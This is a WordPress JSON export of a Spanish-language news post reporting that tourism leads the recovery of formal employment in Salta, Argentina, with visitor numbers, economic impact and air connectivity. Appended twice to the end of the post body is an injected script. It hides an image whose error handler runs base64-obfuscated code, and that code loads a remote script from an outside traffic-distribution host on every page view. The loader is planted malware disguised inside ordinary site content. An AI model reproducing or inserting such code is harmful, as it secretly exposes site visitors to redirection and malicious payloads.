{"id":1662,"date":"2022-10-24T10:17:23","date_gmt":"2022-10-24T13:17:23","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1662"},"modified":"2025-08-14T00:32:30","modified_gmt":"2025-08-14T03:32:30","slug":"el-turismo-lidera-la-recuperacion-del-empleo-formal","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1662","title":{"rendered":"El turismo lidera la recuperaci\u00f3n del empleo formal"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#c70435\"><em>Hasta el 15 de octubre ya llegaron a Salta m\u00e1s de 1.700.000 turistas generando un impacto econ\u00f3mico aproximado de $71.000 millones, demandando m\u00e1s servicios en los emprendimientos tur\u00edsticos.<\/em><\/h3>\n\n\n\n<p>El Instituto Nacional de Estad\u00edsticas y Censo (Indec) public\u00f3 un informe que destaca el incremento interanual en Argentina de los puestos de trabajo comparando el segundo semestre de 2022 y el mismo periodo del a\u00f1o pasado. El sector de hoteler\u00eda y gastronom\u00eda lidera este crecimiento determinado por la cantidad de horas trabajadas (32,3%) y puestos de trabajo (23,5%).<\/p>\n\n\n\n<p>Este viernes el gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>&nbsp;encabez\u00f3 un encuentro con intendentes y legisladores del Valle de Lerma, donde se coordinaron acciones y pol\u00edticas en esta regi\u00f3n. En este marco el ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, expuso indicadores de la actividad que muestran un crecimiento interanual.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4537-el-turismo-lidera-la-recuperacion-del-empleo-formal.jpg\" alt=\"\" width=\"438\" height=\"292\"\/><\/figure><\/div>\n\n\n<p>El funcionario destac\u00f3 \u201cla decisi\u00f3n pol\u00edtica del gobernador&nbsp; S\u00e1enz y de los municipios de llevar adelante un trabajo conjunto apostando a la actividad tur\u00edstica. En el contexto de crisis hist\u00f3rica m\u00e1s duro para el turismo, comenzamos a planificar no s\u00f3lo c\u00f3mo recuperamos los niveles de actividad de 2019, sino trabajamos en pol\u00edticas de crecimiento que fueron plasmadas en nuestro plan estrat\u00e9gico Liderar\u201d, indic\u00f3 el funcionario.<\/p>\n\n\n\n<p>El Plan se apuntala en tres soportes principales: la capacitaci\u00f3n del recurso humano, el desarrollo de los productos tur\u00edsticos y la promoci\u00f3n de los mismos. &nbsp; Pe\u00f1a adelant\u00f3 que algunos objetivos ya se est\u00e1n alcanzando, en materia estad\u00edstica, hasta el 15 octubre \u201ceste a\u00f1o llegaron a Salta 1.700.000 turistas tanto nacionales como internacionales, con un impacto econ\u00f3mico aproximado de $71.000 millones, lo que permite estimar que en el anuario de fin de a\u00f1o veremos cifras sumamente importantes\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/4538-el-turismo-lidera-la-recuperacion-del-empleo-formal.jpg\" alt=\"\" width=\"341\" height=\"227\"\/><\/figure><\/div>\n\n\n<p>En el crecimiento de la actividad y con una decisi\u00f3n pol\u00edtica federal dentro del territorio salte\u00f1o, \u201chay enormes posibilidades de seguir creciendo en las regiones tur\u00edsticas de Selva de Monta\u00f1a, Valle Hist\u00f3rico y Gaucho y en la Puna de los Andes\u201d, se\u00f1al\u00f3 el ministro Pe\u00f1a sobre los objetivos trazados para los pr\u00f3ximos cinco a\u00f1os.<\/p>\n\n\n\n<p>En Cerrillos, este mediod\u00eda el titular de Turismo y Deportes se refiri\u00f3 a la conectividad: Salta tiene a la fecha conexi\u00f3n directa con 9 destinos nacionales (todas las regiones) y una ruta in\u00e9dita a San Pablo (Brasil) que luego de la temporada emisiva de este pa\u00eds, qued\u00f3 establecida de manera permanente con dos frecuencias semanales. Los vuelos nacionales son a Santa Fe, Buenos Aires, C\u00f3rdoba, Tucum\u00e1n, Chaco, R\u00edo Negro, Neuqu\u00e9n, Mendoza y Misiones.&nbsp;<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-turismo-lidera-la-recuperacion-del-empleo-formal-85670\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hasta el 15 de octubre ya llegaron a Salta m\u00e1s de 1.700.000 turistas generando un impacto econ\u00f3mico aproximado de $71.000 millones, demandando m\u00e1s servicios en los emprendimientos tur\u00edsticos. El Instituto Nacional de Estad\u00edsticas y Censo (Indec) public\u00f3 un informe que destaca el incremento interanual en Argentina de los puestos de trabajo comparando el segundo semestre [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1663,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-1662","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1662"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1662"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1662\/revisions"}],"predecessor-version":[{"id":7308,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1662\/revisions\/7308"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1663"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1662"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1662"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1662"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}